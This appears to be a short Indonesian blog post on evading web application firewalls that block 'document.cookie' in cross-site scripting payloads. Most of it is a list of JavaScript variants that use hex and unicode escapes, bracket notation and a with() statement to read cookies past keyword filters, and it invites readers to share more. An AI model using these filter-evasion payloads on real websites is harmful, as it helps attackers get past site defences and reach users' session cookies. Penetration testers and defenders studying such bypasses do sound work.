![]() |
Bypass Blocked document.cookie |
Dalam menerapkan waf ini ada bermacam-macam cara yaitu: dengan memfilter suatu kata atau karakter dan mereplace dengan karakter lain, ataupun jika terdeteksi ada malicious code maka sistem akan menampilkan pesan 403 forbidden dan semacamnya.
Pada kasus yang pernah saya temukan ketika saya ingin menampilkan cookie dengan payload
Lalu bagaimana bypass blocked document.cookie?
Berikut adalah kumpulan code javascript yang dapat digunakan untuk menampilkan cookie sebagai alternatif darialert(cookie)
self['\x61\x6c\x65\x72\x74'](cookie)
document['cookie']
with(document)alert(cookie)
Atau jika website memblock kata document['\x63\x6f\x6f\x6b\x69\x65']
document['\u0063\u006f\u006f\u006b\u0069\u0065']
Itulah yang bisa saya bagikan pada artikel ini, jika kalian punya payload untuk bypass document.cookie yang tidak ada pada artikel diatas, bisa kalian bagikan di kolom komentar. Terimaksih
Share This :
comment 0 komentar
more_vert